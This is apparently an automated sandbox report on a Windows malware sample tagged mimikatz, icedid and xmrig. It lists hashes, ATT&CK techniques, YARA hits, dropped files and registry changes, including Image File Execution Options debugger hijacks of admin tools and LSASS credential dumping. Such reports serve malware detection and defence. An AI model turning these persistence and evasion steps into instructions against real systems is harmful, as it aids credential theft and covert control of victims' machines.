mimikatz | d97ee1e22a9157c4e7977a94eee583ff9ca2a7bbe6d1382773f48980601b2eaa

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
21-10-2024 04:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-10-21_3d54aa8dd24e7c928ff5e7af758899aa_hacktools_icedid_mimikatz.exe
Size

9.8MB
MD5

3d54aa8dd24e7c928ff5e7af758899aa
SHA1

786519b8ae694c96fa3fe81ef481a7bda63b0148
SHA256

d97ee1e22a9157c4e7977a94eee583ff9ca2a7bbe6d1382773f48980601b2eaa
SHA512

e9350dde9769e3d96dbd80365249a13df55840341de141d8918dbbd3ea095e8a276c5a7160a3919f3657ae1744e2fbeb31237149f8ea3f5e276c417677ddd1c7
SSDEEP

196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

yittybr.exe

description	pid	Process	procid_target
PID 1216 created 2056	1216	yittybr.exe	37

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (28361) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 12 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/1448-132-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	xmrig
behavioral2/memory/1448-136-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	xmrig
behavioral2/memory/1448-153-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	xmrig
behavioral2/memory/1448-164-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	xmrig
behavioral2/memory/1448-171-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	xmrig
behavioral2/memory/1448-188-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	xmrig
behavioral2/memory/1448-212-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	xmrig
behavioral2/memory/1448-220-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	xmrig
behavioral2/memory/1448-229-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	xmrig
behavioral2/memory/1448-338-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	xmrig
behavioral2/memory/1448-339-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	xmrig
behavioral2/memory/1448-341-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4608-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/4608-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x000e000000023b6b-6.dat	mimikatz
behavioral2/memory/2500-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/1964-86-0x00007FF7DCC70000-0x00007FF7DCD5E000-memory.dmp	mimikatz
behavioral2/memory/1964-88-0x00007FF7DCC70000-0x00007FF7DCD5E000-memory.dmp	mimikatz

Drops file in Drivers directory 2 IoCs

Processes:

yittybr.exe

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	yittybr.exe
File created	C:\Windows\system32\drivers\etc\hosts	yittybr.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

Processes:

yittybr.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exe

pid	Process
2548	netsh.exe
3036	netsh.exe

Executes dropped EXE 29 IoCs

Processes:

yittybr.exeyittybr.exewpcap.exebjfisnrbq.exevfshost.exebtjlhtrlh.exexohudmc.exeqicmew.exettlnnh.exebtjlhtrlh.exeyittybr.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exevmlbqggye.exeyittybr.exe

pid	Process
2500	yittybr.exe
1216	yittybr.exe
1792	wpcap.exe
996	bjfisnrbq.exe
1964	vfshost.exe
2520	btjlhtrlh.exe
1528	xohudmc.exe
4368	qicmew.exe
1448	ttlnnh.exe
4432	btjlhtrlh.exe
368	yittybr.exe
4752	btjlhtrlh.exe
4476	btjlhtrlh.exe
3640	btjlhtrlh.exe
2288	btjlhtrlh.exe
3780	btjlhtrlh.exe
2756	btjlhtrlh.exe
4276	btjlhtrlh.exe
4156	btjlhtrlh.exe
2260	btjlhtrlh.exe
2512	btjlhtrlh.exe
3896	btjlhtrlh.exe
2424	btjlhtrlh.exe
1808	btjlhtrlh.exe
4540	btjlhtrlh.exe
3420	btjlhtrlh.exe
3464	btjlhtrlh.exe
4260	vmlbqggye.exe
4668	yittybr.exe

Loads dropped DLL 3 IoCs

Processes:

bjfisnrbq.exe

pid	Process
996	bjfisnrbq.exe
996	bjfisnrbq.exe
996	bjfisnrbq.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
77	ifconfig.me
78	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 13 IoCs

Processes:

yittybr.exexohudmc.exe

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF	yittybr.exe
File created	C:\Windows\SysWOW64\qicmew.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\qicmew.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	yittybr.exe

UPX packed file 37 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x0008000000023c36-84.dat	upx
behavioral2/memory/1964-86-0x00007FF7DCC70000-0x00007FF7DCD5E000-memory.dmp	upx
behavioral2/memory/1964-88-0x00007FF7DCC70000-0x00007FF7DCD5E000-memory.dmp	upx
behavioral2/files/0x0008000000023c68-91.dat	upx
behavioral2/memory/2520-92-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp	upx
behavioral2/memory/2520-102-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp	upx
behavioral2/files/0x0008000000023c65-113.dat	upx
behavioral2/memory/1448-114-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	upx
behavioral2/memory/4432-121-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp	upx
behavioral2/memory/4752-129-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp	upx
behavioral2/memory/1448-132-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	upx
behavioral2/memory/4476-134-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp	upx
behavioral2/memory/1448-136-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	upx
behavioral2/memory/3640-139-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp	upx
behavioral2/memory/2288-143-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp	upx
behavioral2/memory/3780-147-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp	upx
behavioral2/memory/2756-151-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp	upx
behavioral2/memory/1448-153-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	upx
behavioral2/memory/4276-156-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp	upx
behavioral2/memory/4156-160-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp	upx
behavioral2/memory/1448-164-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	upx
behavioral2/memory/2260-165-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp	upx
behavioral2/memory/2512-169-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp	upx
behavioral2/memory/1448-171-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	upx
behavioral2/memory/3896-174-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp	upx
behavioral2/memory/2424-178-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp	upx
behavioral2/memory/1808-182-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp	upx
behavioral2/memory/4540-186-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp	upx
behavioral2/memory/1448-188-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	upx
behavioral2/memory/3420-191-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp	upx
behavioral2/memory/3464-195-0x00007FF6110E0000-0x00007FF61113B000-memory.dmp	upx
behavioral2/memory/1448-212-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	upx
behavioral2/memory/1448-220-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	upx
behavioral2/memory/1448-229-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	upx
behavioral2/memory/1448-338-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	upx
behavioral2/memory/1448-339-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	upx
behavioral2/memory/1448-341-0x00007FF6A1E00000-0x00007FF6A1F20000-memory.dmp	upx

Drops file in Windows directory 60 IoCs

Processes:

yittybr.execmd.exe2024-10-21_3d54aa8dd24e7c928ff5e7af758899aa_hacktools_icedid_mimikatz.exevmlbqggye.exe

description	ioc	Process
File created	C:\Windows\tllefmnq\vimpcsvc.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\AppCapture32.dll	yittybr.exe
File opened for modification	C:\Windows\ppgkyibiq\Corporate\log.txt	cmd.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\libxml2.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\vimpcsvc.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\svschost.exe	yittybr.exe
File created	C:\Windows\tllefmnq\schoedcl.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\Shellcode.ini	yittybr.exe
File created	C:\Windows\tllefmnq\svschost.xml	yittybr.exe
File opened for modification	C:\Windows\tllefmnq\vimpcsvc.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\schoedcl.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\crli-0.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\vimpcsvc.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\docmicfg.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\tibe-2.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\tucl-1.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\docmicfg.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\schoedcl.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\AppCapture64.dll	yittybr.exe
File created	C:\Windows\tllefmnq\yittybr.exe	2024-10-21_3d54aa8dd24e7c928ff5e7af758899aa_hacktools_icedid_mimikatz.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\exma-1.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\posh-0.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\libeay32.dll	yittybr.exe
File opened for modification	C:\Windows\tllefmnq\spoolsrv.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\upbdrjv\swrpwe.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\schoedcl.xml	yittybr.exe
File opened for modification	C:\Windows\tllefmnq\svschost.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\Packet.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\ucl.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\vimpcsvc.xml	yittybr.exe
File opened for modification	C:\Windows\tllefmnq\docmicfg.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\Corporate\vfshost.exe	yittybr.exe
File opened for modification	C:\Windows\tllefmnq\yittybr.exe	2024-10-21_3d54aa8dd24e7c928ff5e7af758899aa_hacktools_icedid_mimikatz.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\vmlbqggye.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\ssleay32.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\Corporate\mimidrv.sys	yittybr.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\ip.txt	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\spoolsrv.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\docmicfg.xml	yittybr.exe
File created	C:\Windows\tllefmnq\spoolsrv.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\cnli-1.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\svschost.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe	yittybr.exe
File opened for modification	C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt	vmlbqggye.exe
File created	C:\Windows\ime\yittybr.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\scan.bat	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\trch-1.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\spoolsrv.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\svschost.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\zlib1.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\spoolsrv.xml	yittybr.exe
File created	C:\Windows\tllefmnq\docmicfg.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\trfo-2.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\xdvl-0.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\Corporate\mimilib.dll	yittybr.exe
File opened for modification	C:\Windows\ppgkyibiq\ihnqsqiep\Packet.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\coli-0.dll	yittybr.exe
File opened for modification	C:\Windows\tllefmnq\schoedcl.xml	yittybr.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid	Process
1388	sc.exe
740	sc.exe
1308	sc.exe
1944	sc.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
